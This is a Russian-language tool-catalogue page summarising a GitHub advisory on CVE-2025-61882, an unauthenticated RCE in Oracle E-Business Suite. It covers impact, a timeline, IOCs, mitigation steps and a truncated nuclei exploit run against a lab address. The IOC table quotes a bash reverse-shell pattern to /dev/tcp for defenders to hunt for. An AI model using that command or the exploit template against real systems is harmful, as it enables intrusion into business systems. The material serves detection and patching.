Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-61882 — Предоставляет подробный advisory по CVE-2025-61882 с техническим анализом, IOCs, запросами обнаружения и шаблоном эксплойта на основе nuclei для pre-auth RCE в Oracle E-Business Suite. | Kitploit
Инструменты/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеРазведка угрозРеагирование на Инциденты
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Предоставляет подробный advisory по CVE-2025-61882 с техническим анализом, IOCs, запросами обнаружения и шаблоном эксплойта на основе nuclei для pre-auth RCE в Oracle E-Business Suite.

Репозиторий
2150 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️🚨 CVE‑2025‑61882 — Критическое удалённое выполнение кода без аутентификации в Oracle E‑Business Suite (EBS) 🚨🛡️

Краткое описание: Критическое удалённое выполнение кода без аутентификации в Oracle E‑Business Suite (EBS) — затрагивает версии 12.2.3 → 12.2.14, CVSS 9.8, активно эксплуатируется в реальных атаках (сообщается о вымогательстве/шантаже). ([oracle.com][1])


📌 Краткие факты (таблица)

ПолеДетали
🆔 CVECVE‑2025‑61882
🧾 Продукт / КомпонентOracle E‑Business Suite (EBS) — интеграция Concurrent Processing / BI Publisher
📦 Затронутые версии12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ ТипУдалённое выполнение кода (RCE) — аутентификация не требуется
🔥 Эксплуатируется в реальных атакахДа — сообщается о массовых атаках / кампаниях вымогательства
📅 Раскрытие / хронологияОктябрь 2025 (уведомление вендора + публичные отчёты). ([oracle.com][1])

(Выше — сводка из уведомления вендора, NVD/CISA и нескольких аналитических отчётов вендоров.) ([oracle.com][1])


💥 Влияние (таблица)

Область влиянияЧто это означает
🔓 КонфиденциальностьЗлоумышленники могут читать чувствительные данные HR/финансов/ERP
🛠️ ЦелостностьЗлоумышленники могут изменять записи, создавать бэкдоры или изменять конфигурации
⚡ ДоступностьЗлоумышленники могут нарушить работу сервисов, запустить программы‑вымогатели или уничтожить резервные копии
🧭 Уровень рискаЭкстремальный — RCE без аутентификации в критической ERP‑системе → возможный полный захват домена

Ссылки на отчёты о высокоэффективной эксплуатации и связи с программами‑вымогателями. ([Rapid7][2])


🛠️ Техническое описание (кратко)

  • Вектор: HTTP/HTTPS‑запросы к открытым веб‑эндпоинтам EBS запускают цепочку уязвимостей в интеграции Concurrent Processing / BI Publisher, приводящую к удалённому выполнению кода. ([oracle.com][1])
  • Сложность: Низкая (без аутентификации, без взаимодействия с пользователем). ([nvd.nist.gov][3])
  • Наблюдаемые полезные нагрузки: reverse shell, веб‑шеллы, скрипты для кражи данных и вымогательства. ([Rapid7][2])

🕵️‍♀️ Индикаторы компрометации (IOC) — примеры (таблица)

Oracle и команды реагирования на инциденты опубликовали IOC; ниже приведены репрезентативные примеры из уведомлений и отчётов вендоров. Ищите эти паттерны в журналах и на конечных точках. ([oracle.com][1])

ТипПример
🌐 IP‑адреса (наблюдаемые)200.107.207.26, 185.181.60.11 (примеры адресов из отчётов)
🧾 Паттерн командыsh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Хеши файловНесколько SHA‑256 хешей подозрительных эксплойт‑скриптов (полный список — в уведомлении вендора)
🕳️ АртефактыНеожиданные веб‑шеллы, новые cron‑задания, подозрительные исходящие соединения на необычные IP/порты

Если вам нужен полный список IOC (IP‑адреса, полные хеши, имена файлов), я могу вставить его сюда — напишите «вставь IOC». (Без ссылок.)


🧭 Хронология (компактно)

ДатаСобытие
9 августа 2025Самая ранняя зафиксированная реальная эксплуатация (телеметрия вендора). ([crowdstrike.com][4])
Начало октября 2025Oracle выпустила предупреждение безопасности / патчи для EBS. ([oracle.com][1])
6–7 октября 2025CISA добавила CVE в каталог Known Exploited Vulnerabilities (KEV) (рекомендации для федеральных агентств, сроки устранения). ([cisa.gov][5])
Октябрь 2025 (продолжается)Множественные отчёты вендоров и сообщения о массовой эксплуатации (CrowdStrike, Rapid7, Tenable и др.). ([crowdstrike.com][4])

✅ Немедленные рекомендуемые действия (таблица шагов)

ПриоритетДействиеПримечания / примеры
1️⃣ КритическийУстановить патчи на затронутые экземпляры EBSНемедленно примените патчи из Security Alert Oracle для версий 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ ВысокийИзолировать / ограничить доступ к веб‑эндпоинтам EBSЗаблокируйте доступ к HTTP/HTTPS EBS из интернета; разрешите только доверенные IP администраторов или VPN.
3️⃣ ВысокийВключить/настроить правила WAFРазверните сигнатуры WAF от вендоров/сообщества для паттернов эксплойта; блокируйте подозрительные полезные нагрузки. ([Rapid7][2])
4️⃣ ВысокийПоиск и обнаружениеИщите в журналах команды reverse shell, аномальные записи файлов и исходящие соединения с IOC.
5️⃣ ИнцидентСдерживание и реагирование при обнаружении компрометацииИзолируйте хост, сохраните криминалистические доказательства, смените учётные данные, восстановите из чистых резервных копий.
6️⃣ ПолитикаОтчётность и уведомлениеЕсли вы подпадаете под регуляторные/контрактные требования, уведомите заинтересованные стороны и органы власти согласно политике (может применяться руководство CISA/KEV). ([nvd.nist.gov][3])

💀 Эксплойты :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Скачать инструмент